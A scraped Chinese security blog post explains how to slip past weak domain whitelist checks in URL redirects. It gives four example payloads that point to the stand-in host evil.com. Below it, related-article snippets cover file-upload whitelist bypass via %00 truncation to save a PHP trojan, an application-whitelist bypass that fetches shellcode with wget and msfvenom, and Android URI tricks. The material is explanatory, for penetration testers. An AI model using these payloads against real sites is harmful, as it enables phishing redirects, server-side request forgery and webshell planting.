利用URL特性绕过域名白名单检测

最新推荐文章于 2025-03-14 15:33:32 发布

changetjut

最新推荐文章于 2025-03-14 15:33:32 发布

阅读量1.1w

点赞数

分类专栏：信息安全文章标签： url跳转

本文链接：https://blog.youkuaiyun.com/change518/article/details/54286473

版权

信息安全专栏收录该内容

40 篇文章

订阅专栏

以URL跳转举例：URL跳转漏洞主要是利用浏览器对URL特性的支持，绕过一些正则匹配不严谨的防护。

1.“@”
http://www.target.com/redirecturl=http://whitelist.com@evil.com

2.“\”
http://www.target.com/redirecturl=http://evil.com\a.whitelist.com

3.“?”
http://www.target.com/redirecturl=http://evil.com?a.whitelist.com

4.“#”
http://www.target.com/redirecturl=http://evil.com#a.whitelist.com

以上问题不单单会影响URL跳转漏洞的防护，只要涉及到对URL白名单检测的地方都可能存在此问题，比如：微信、QQ等对聊天内容中对URL的检测；检测文章/论坛帖子等中是否插入了外部图片；[远程]文件包含/读取；等等

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

changetjut

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【漏洞挖掘】——78、白名单检测绕过

Fly_鹏程万里

06-12

324

从以上代码中可以看到此处对文件的Type进行了检查，只允许image/jpeg、image/png、image/gif三种格式，而且直接为服务器端校验，对于服务端的这种校验方式我们可以通过BP抓包来更改content-Type为其允许的类型即可。这里采用白名单判断，但是$img_path直接拼接，所以可以先上传一个符合白名单检测的jpg文件之后在BP中使用%00截断保存路径即可绕过检测，最后保存一个php类型的木马文件。采用白名单检查而且这里的保存路径直接拼接可以使用0x00截断来绕过。

基于t.cn生成的短链接绕过白名单方案

Soujer

04-29

581

1 条评论您还未登录，请先登录后发表或查看评论

挖洞技巧:如何绕过URL限制

zhangge3663的博客

03-12

9324

大家对URL任意跳转都肯定了解，也知道他的危害，这里我就不细说了，过~ 大家遇到的肯定都是很多基于这样的跳转格式：http://www.xxx.xxx/xxx?xxx=http://www.xxx.xxx/xxxxx 基本的思路大家就是直接替换后面的URL来检测是否存在任意URL跳转，如果不存在，就直接返回到它自己的域名，如果存在，就跳转到你指定的URL。这里我讲述我所知道的所以小点。 ...

网络安全工程师必看！SRC漏洞挖掘之URL重定向漏洞骚技巧！黑客技术零基础入门到精通教程

最新发布

wholeliubei的博客

03-14

758

这几天跟着我那几个师傅们在学习URL重定向漏洞，学习了比较多的对于这个漏洞的骚技巧，以及在挖掘edusrc漏洞和企业src相关的URL重定向漏洞时的一些技巧和不错的思路。最近在跟我那几个师傅们研究学习URL重定向漏洞，然后在一些厂商项目中开始接触到一些url任意重定向，虽然是低危，奖金较低，但是一个厂商所有点的url跳转加起来奖金也比较可观，所以将自己挖掘过程中一点点心得分享一下。

SSRF绕过域名白名单的一种方式——CVE-2024-24806（影响大量nodejs服务）

ooooooih的博客

04-29

1655

挖SRC也有一段时间了，除了逻辑漏洞就是XSS，感觉没啥提升的样子（叠甲：没有瞧不起逻辑漏洞的意思，我挖得最多的就是逻辑！！），所以最近空闲时间去看了看历史的CVE报告，学习一下大佬们的思路的技巧，前段时间看到一个很有意思的漏洞，分享一下。

绕过应用程序白名单技巧

hl1293348082的专栏

03-28

1473

在内网渗透中，经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况，很多时候是由与安全软件做了白名单限制，只允许指定的白名单中的应用程序启动，这时我们就需要利用白名单中的程序做我们想做的事情，执行我们想要执行的程序，下面就给大家分享几个绕过白名单执行应用程序的姿势。一、通过 csharp 编译文件绕过防病毒软件 1、下载 CSharp 文件 wget http://tinyurl.com/InstallUtil-ShellCode-cs 2、使用 msfvenom 生成一个 msf

关于绕过域名（ip）校验的一些小知识

weixin_30955341的博客

12-04

1751

这篇文章最开始只是想写一个关于绕过referer的方法，写着写着发现和ssrf以及url跳转的一些手法类似，于是把这两种也加上了对referer做校验一般是对csrf进行防范的手段之一，但是很多时候不经意间还会增加其他攻击的难度，如xss，jsonp劫持等等。这里对referer的绕过做一个小的总结：目标网站是：www.domain.com 攻击者的域名是:evil.com ...

上传验证绕过——服务端白名单绕过

Williamanddog的博客

01-28

1763

文件上传验证绕过的服务的白名单绕过方式，MIME类型检测绕过和%00截断绕过

不安全文件下载与上传之——上传漏洞之——路径/扩展名绕过之——黑名单白名单绕过

温柔小薛的博客

04-06

1322

黑名单绕过（这标题也忒长了点了）大家谁懂那个如何针对 php和windows环境的叠加绕过文件上传（不是DATA，是另一个特性）这个绕过进行一些防御呢文件大小写改变大小写防御：统一转换为小写名单绕过比如黑名单里没有.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|...

文件上传漏洞-白名单检测

dkxkl1314的博客

04-19

975

上传一张图片与上传一个自己构造的后缀，如果只能上传图片不能上传其它后缀文件，说明是白名单检测。可以利用00截断的方式进行绕过，包括%00截断与0x00截断。

URL跳转漏洞的一些常用绕过方法

Sys1em32 安全之路

12-13

2648

对各种绕过方法做一个汇总，方便自己使用查找。 https://aaa.com/xx?Url=http://www.test.com 文章中test为跳转网站示例，aaa为本身的域名 0x01.利用问号绕过 http://www.aaa.com/acb?Url=http://test.com?login.aaa.com test.com为你要跳转的域名,后面跟上网站自身的域名 0x0...

关于Angularjs中跨域设置白名单问题

10-18

然而，为了实现前后端分离或者API调用，开发者常常需要绕过这一限制。在AngularJS中，我们可以利用JSONP（JSON with Padding）或者CORS（Cross-Origin Resource Sharing）这两种方式来实现跨域请求。对于JSONP，它...

通过DNS响应欺骗来绕过域控制验证

weixin_34218890的博客

09-15

613

本文讲的是通过DNS响应欺骗来绕过域控制验证，在用户验证他们有域名控制权后，Detectify才会扫描这个网站。其中一个验证方法是向域添加一个DNS TXT记录，其中包含由Detectify提供的字符串。当用户进行验证时，Detectify将执行DNS查询并检查相应字符串。让我们来看看它是如何通过 DNS 响应欺骗来绕过域控制验证。译者注：Dete...

绕过Android域名白名单校验的方法

键盘的起始页

02-24

889

而AbstractHierarchicalUri又是继承自Uri，所以很容易想到，通过反射调用HierarchicalUri这个私有构造函数，传入构造好的 authority 和 path, 创建一个任意可控的Uri实例。然而，对于第一个链接，浏览器会自动把反斜杠 "\" 纠正为正斜杠 "/"对于第二个链接，反斜杠 "\" 会以 URL 编码形式保留而无法触发方法1。事实上，有大量的开发者因为不了解这个性质，认为传入的 url 已经是”正常“通过。，才是被攻击的 Activity 拉起的实际地址。

白名单绕过（%00截断）全网都不会详细讲解的截断原理

m0_58351659的博客

04-01

9367

白名单绕过（%00截断）

深入浅出带你了解文件上传白名单绕过

qq_44005305的博客

01-02

2628

今天比较详细的讲了文件上传白名单绕过原理以及应用方法，可能刚开始学不太好理解。有兴趣的小伙伴可以自己去搭建靶机来进行测试，喜欢的小伙伴不妨一键三连。# 学习计划安排我一共划分了六个阶段，但并不是说你得学完全部才能上手工作，对于一些初级岗位，学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，需要的小伙伴可以扫描下方优快云官方合作二维码免费领取哦，无偿分享！！！如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉。

【挖洞经验】url重定向

Fly_鹏程万里

12-20

2812

url重定向绕过方式俗话说的好，上有政策，下有对策，url重定向的绕过姿势也越来越多样化。普通url重定向方法测试不成功，换个姿势，说不定可以再次绕过。这里总结下成功的绕过方式。（1）使用#或者@或者？或者\来绕过这个是比较常见的绕过方式，利用程序或者浏览器对这些特殊符号的解析，可以让url重定向到我们指定的地址。不过，大部分的开发已经注意到了这点，已经做...

web安全第六天：绕过白名单监测实现文件上传

cc777777777的博客

02-27

5314

web安全第六天：绕过白名单监测实现文件上传

web黑名单验证绕过

weixin_34252090的博客

12-18

640

window下除了空格小数点可以绕过还可以利用nfsads数据流来绕过转载于:https://blog.51cto.com/0x007/1591347

kkfileview 白名单

02-21

### kkfileview 白名单配置和管理为了有效管理和配置 `kkfileview` 的白名单，确保系统的安全性并防止潜在的安全风险，可以采取如下措施： #### 配置文件设置在服务器端的配置文件中设定允许访问的文件目录。对于 PHP 应用程序而言，在 php.ini 文件里可以通过设置 `open_basedir` 来限制脚本能够操作哪些目录下的文件[^2]。 ```ini ; 只允许访问指定目录及其子目录内的资源 open_basedir = "/var/www/html/:/tmp/" ``` #### 输入验证与过滤当处理来自用户的请求参数时，务必实施严格的输入校验机制。这包括但不限于对 URL 参数中的特殊字符进行检测，并阻止任何可能用于绕过安全控制的行为，如尝试通过相对路径 (`../`) 或绝对路径来定位其他位置上的文件。 - **黑名单模式**：识别并拒绝已知危险字符串； - **白名单模式**：仅接受预定义范围内合法的内容形式；例如，在接收文件名作为查询条件的情况下，应该先确认其扩展名为预期类型之一（`.jpg`, `.png`, etc.），再进一步解析实际存储位置前完成必要的清理工作。 ```php <?php // 假设 $input 是未经处理过的原始数据 $allowedExtensions = ['jpg', 'jpeg', 'gif', 'png']; $fileExtension = pathinfo($input, PATHINFO_EXTENSION); if (!in_array(strtolower($fileExtension), $allowedExtensions)) { die('Invalid file type.'); } $safePath = basename($input); // 移除所有非字母数字字符以及斜杠 ?> ``` #### 小程序环境特定考量如果是在微信小程序环境中部署，则需要注意 `<web-view>` 组件所使用的源地址也需要遵循平台规定的要求——即必须事先于微信公众平台上登记备案过的域名列表之内才能正常加载页面[^3]。综上所述，针对 `kkfileview` 进行有效的白名单策略制定不仅有助于增强应用本身抵御恶意攻击的能力，同时也保障了用户体验的一致性和稳定性。